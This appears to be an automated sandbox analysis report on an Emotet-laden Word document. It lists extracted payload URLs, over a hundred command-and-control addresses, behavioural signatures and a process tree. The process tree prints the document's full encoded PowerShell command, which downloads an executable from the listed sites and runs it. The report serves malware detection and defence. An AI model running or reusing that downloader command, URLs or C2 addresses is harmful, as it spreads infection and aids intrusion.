Analysis
-
max time kernel
130s -
resource
win10v191014 -
submitted
18-12-2019 15:53
Task
task1
Sample
Docs_7dac2a66623818161fa64d5a660f0c66.3.doc
Resource
win7v191014
General
Malware Config
Extracted
https://www.meee-designbuild.com/wp-content/vs718/
https://cardesign-analytics.com/messagelist/wdi9/
https://www.danytex.com/cgi-bin/c5b2ze315/
http://nexusfantasy.com/rxmu/eebmh133/
http://basic.woo-wa.com/lwral/wz87053/
Extracted
emotet
63.248.198.8:80
189.19.81.181:443
130.204.247.253:80
96.126.121.64:443
104.236.137.72:8080
85.234.143.94:8080
51.255.165.160:8080
118.36.70.245:80
190.210.184.138:995
188.135.15.49:80
139.162.118.88:8080
72.29.55.174:80
68.183.170.114:8080
181.231.62.54:80
192.241.146.84:8080
71.76.45.83:443
63.246.252.234:80
37.211.49.127:80
74.59.187.94:80
5.88.27.67:8080
91.74.175.46:80
81.157.234.90:8080
87.106.77.40:7080
76.221.133.146:80
82.36.103.14:80
201.213.32.59:80
86.42.166.147:80
113.61.76.239:80
183.99.239.141:80
142.127.57.63:8080
45.8.136.201:80
79.7.114.1:80
83.248.141.198:80
50.28.51.143:8080
93.148.252.90:80
185.86.148.222:8080
203.130.0.69:80
45.79.95.107:443
96.38.234.10:80
223.255.148.134:80
96.61.113.203:80
2.45.112.134:80
200.124.225.32:80
149.135.123.65:80
87.106.46.107:8080
82.8.232.51:80
195.223.215.190:80
190.195.129.227:8090
68.129.203.162:443
159.203.204.126:8080
62.75.143.100:7080
37.120.185.153:443
93.67.154.252:443
74.79.103.55:80
37.183.121.32:80
68.174.15.223:80
91.204.163.19:8090
77.55.211.77:8080
138.68.106.4:7080
109.169.86.13:8080
45.50.177.164:80
186.15.83.52:8080
200.119.11.118:443
73.60.8.210:80
111.125.71.22:8080
217.199.160.224:8080
82.196.15.205:8080
62.75.160.178:8080
190.186.164.23:80
151.237.36.220:80
85.152.208.146:80
178.79.163.131:8080
46.101.212.195:8080
46.28.111.142:7080
5.196.35.138:7080
119.59.124.163:8080
144.139.56.105:80
191.103.76.34:443
14.160.93.230:80
94.200.114.162:80
204.63.252.182:443
68.183.190.199:8080
77.27.221.24:443
190.97.30.167:990
149.62.173.247:8080
190.100.153.162:443
181.36.42.205:443
116.48.148.32:80
190.6.193.152:8080
181.135.153.203:443
83.165.78.227:80
188.216.24.204:80
91.83.93.124:7080
2.139.158.136:443
112.218.134.227:80
91.117.83.59:80
185.160.212.3:80
181.61.143.177:80
91.205.215.57:7080
181.198.203.45:443
104.131.58.132:8080
212.237.50.61:8080
80.11.158.65:8080
212.71.237.140:8080
69.163.33.84:8080
116.48.138.115:80
186.68.48.204:443
2.42.173.240:80
219.75.66.103:80
142.93.114.137:8080
152.170.108.99:443
200.58.83.179:80
5.32.41.106:80
97.81.12.153:80
207.154.204.40:8080
24.100.130.206:80
2.44.167.52:80
203.25.159.3:8080
190.146.131.105:8080
163.172.40.218:7080
125.99.61.162:7080
99.252.27.6:80
Signatures
-
Process spawned unexpected child process 1 IoCs
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4440 5072 Powershell.exe 72 -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4440 Powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4440 Powershell.exe 656 sitkaappid.exe -
Suspicious behavior: EmotetMutantsSpam 2 IoCs
pid Process 3412 153.exe 656 sitkaappid.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 5028 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 5028 WINWORD.EXE 2844 153.exe 3412 153.exe 532 sitkaappid.exe 656 sitkaappid.exe -
Executes dropped EXE 4 IoCs
pid Process 2844 153.exe 3412 153.exe 532 sitkaappid.exe 656 sitkaappid.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU -
Drops file in System32 directory 6 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE sitkaappid.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies sitkaappid.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 sitkaappid.exe File renamed C:\Users\Admin\153.exe => C:\Windows\SysWOW64\sitkaappid.exe 153.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat sitkaappid.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 sitkaappid.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 5028 WINWORD.EXE -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 4440 wrote to memory of 2844 4440 Powershell.exe 86 PID 2844 wrote to memory of 3412 2844 153.exe 87 PID 532 wrote to memory of 656 532 sitkaappid.exe 89
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Docs_7dac2a66623818161fa64d5a660f0c66.3.doc" /o ""1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of FindShellTrayWindow
PID:5028
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell -w hidden -en JABHAHYAZQBwAHkAYwBsAHYAPQAnAEgAcwB3AHIAaAB2AG8AcgBpAGQAbwBsACcAOwAkAEUAdgB6AGkAYwBxAGEAaQB3AHYAbQB0AG8AIAA9ACAAJwAxADUAMwAnADsAJABGAGMAbgByAG4AcABxAGwAegBlAG4APQAnAFoAdQB0AGEAaQBvAHYAeQBlAHEAcAB6ACcAOwAkAE0AegBqAGYAbgBhAGwAagBvAGoAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEUAdgB6AGkAYwBxAGEAaQB3AHYAbQB0AG8AKwAnAC4AZQB4AGUAJwA7ACQARwB5AG0AdgByAGcAegBzAD0AJwBEAGUAZQByAGgAdwBtAHQAbAB1AHMAbgBrACcAOwAkAE0AcAB4AHgAbABuAGUAagBpAHUAawA9AC4AKAAnAG4AZQB3AC0AbwAnACsAJwBiAGoAJwArACcAZQBjAHQAJwApACAATgBlAFQALgB3AGUAQgBjAGwASQBlAG4AVAA7ACQASQBlAHYAZQBtAHYAaQBxAGQAbQBnAHcAPQAnAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAG0AZQBlAGUALQBkAGUAcwBpAGcAbgBiAHUAaQBsAGQALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwB2AHMANwAxADgALwAqAGgAdAB0AHAAcwA6AC8ALwBjAGEAcgBkAGUAcwBpAGcAbgAtAGEAbgBhAGwAeQB0AGkAYwBzAC4AYwBvAG0ALwBtAGUAcwBzAGEAZwBlAGwAaQBzAHQALwB3AGQAaQA5AC8AKgBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBkAGEAbgB5AHQAZQB4AC4AYwBvAG0ALwBjAGcAaQAtAGIAaQBuAC8AYwA1AGIAMgB6AGUAMwAxADUALwAqAGgAdAB0AHAAOgAvAC8AbgBlAHgAdQBzAGYAYQBuAHQAYQBzAHkALgBjAG8AbQAvAHIAeABtAHUALwBlAGUAYgBtAGgAMQAzADMALwAqAGgAdAB0AHAAOgAvAC8AYgBhAHMAaQBjAC4AdwBvAG8ALQB3AGEALgBjAG8AbQAvAGwAdwByAGEAbAAvAHcAegA4ADcAMAA1ADMALwAnAC4AIgBTAGAAUABMAEkAVAAiACgAJwAqACcAKQA7ACQAUABjAHIAYgBsAHgAcgBvAD0AJwBNAG4AaQB2AGQAdQBoAHUAdQB3ACcAOwBmAG8AcgBlAGEAYwBoACgAJABKAHgAbwBmAGgAagBsAG0AYQBnAGcAIABpAG4AIAAkAEkAZQB2AGUAbQB2AGkAcQBkAG0AZwB3ACkAewB0AHIAeQB7ACQATQBwAHgAeABsAG4AZQBqAGkAdQBrAC4AIgBEAE8AVwBgAE4AbABPAEEARABGAGAASQBMAGUAIgAoACQASgB4AG8AZgBoAGoAbABtAGEAZwBnACwAIAAkAE0AegBqAGYAbgBhAGwAagBvAGoAKQA7ACQARABxAGkAZAB3AG8AZQBqAHQAbwA9ACcAQwBlAGkAcQBvAGEAbQBwAHIAaAB1AGoAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAJwArACcAdAAtAEkAdABlACcAKwAnAG0AJwApACAAJABNAHoAagBmAG4AYQBsAGoAbwBqACkALgAiAEwAZQBgAE4AZwBgAFQASAAiACAALQBnAGUAIAAyADMAMAA3ADQAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAcwBgAFQAYQByAFQAIgAoACQATQB6AGoAZgBuAGEAbABqAG8AagApADsAJABBAGwAdABwAHIAeQBmAHkAYQA9ACcAQgBkAGsAZABxAHkAbwBwAHQAJwA7AGIAcgBlAGEAawA7ACQAUQBmAHUAawBvAHMAdgB3AHoAegA9ACcARAB4AHoAeQBoAHUAdwBmAGkAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAWQBqAGUAbgByAHcAdQBvAGUAPQAnAFYAbgB2AGgAagBuAGQAZAB0AGgAZAAnAA==1⤵
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4440 -
C:\Users\Admin\153.exe"C:\Users\Admin\153.exe"2⤵
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2844 -
C:\Users\Admin\153.exe--2934414d3⤵
- Suspicious behavior: EmotetMutantsSpam
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
- Drops file in System32 directory
PID:3412
-
-
-
C:\Windows\SysWOW64\sitkaappid.exe"C:\Windows\SysWOW64\sitkaappid.exe"1⤵
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:532 -
C:\Windows\SysWOW64\sitkaappid.exe--c33b8cba2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: EmotetMutantsSpam
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
- Drops file in System32 directory
PID:656
-